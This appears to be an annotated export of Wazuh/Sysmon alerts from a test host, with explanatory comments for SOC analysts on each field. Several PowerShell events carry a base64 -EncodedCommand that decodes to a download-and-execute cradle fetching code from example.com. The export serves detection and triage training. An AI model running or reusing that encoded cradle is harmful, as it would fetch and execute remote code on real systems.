data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:34:19.648 ProcessGuid: {94294ddc-bc6a-680a-5b0a-000000000e00} ProcessId: 12136 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_4o4hfpih.vzn.ps1 CreationUtcTime: 2025-04-24 22:34:19.648 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:34:19.648
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc6a-680a-5b0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12136
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_4o4hfpih.vzn.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:34:19.648
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:47.619+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:47.619+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534207.837539
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:34:42.0199627Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281347
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:34:40.473 ProcessGuid: {94294ddc-bc80-680a-710a-000000000e00} ProcessId: 12900 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bc7e-680a-6f0a-000000000e00} ParentProcessId: 2488 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:34:40.473
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc80-680a-710a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12900
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc7e-680a-6f0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  2488
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:47.667+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:47.667+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534207.845605
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:34:43.1695516Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281372
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:34:42.701 ProcessGuid: {94294ddc-bc82-680a-730a-000000000e00} ProcessId: 14400 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bc80-680a-710a-000000000e00} ParentProcessId: 12900 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:34:42.701
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bc82-680a-730a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14400
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bc80-680a-710a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  12900
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:48.102+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:48.102+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534208.853675
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:15.5626418Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281711
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:15.537 ProcessGuid: {94294ddc-bca2-680a-8c0a-000000000e00} ProcessId: 8152 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_rwqywtk0.t2z.ps1 CreationUtcTime: 2025-04-24 22:35:15.537 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:15.537
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bca2-680a-8c0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8152
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_rwqywtk0.t2z.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:15.537
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:48.274+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:48.274+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534208.856439
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:19.7921118Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  281758
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

